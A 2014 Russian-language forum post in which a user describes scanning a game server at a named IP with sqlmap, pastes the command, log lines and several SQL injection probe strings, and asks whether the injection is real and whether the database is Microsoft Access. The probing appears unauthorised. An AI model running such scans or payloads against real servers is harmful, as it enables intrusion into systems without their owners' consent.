Ваши вопросы по уязвимостям.

#11

06.01.2014, 18:22

verda

Новичок

Регистрация: 10.03.2013

Сообщений: 1

С нами: 6934646

Репутация: 0

Просканировал с помощью sqlmap один игровой сервер

sqlmap --url="http://95.163.86.72/cgi-bin/webstrk.exe/strike?t=1" --data="position=0&tmpid=01234567890234567890"

в логе написало:

......

[16:45:33] [INFO] POST parameter 'position' is 'AND boolean-based blind - WHERE or HAVING clause' injectable

[16:45:44] [INFO] heuristic (extended) test shows that the back-end DBMS could be 'Microsoft Access'

.....

[16:51:10] [WARNING] POST parameter 'position' is not injectable

[16:51:10] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp')

.....

Тестировал несколько раз.

Просмотрев лог запросов увидел что срабатывало на

position=-6458' OR (3053=8541)

position=0%22%29%20AND%206045%3D4434%20AND%20%28%2 2sLat%22%3D%22sLat

position=0%20AND%205338%3D7364

Вручную перебирал - ничего толкового не выходило (ошибки так таковой нету).

Вопрос - Есть ли вообще инъекция и какая база данных? (Microsoft Access или нет?)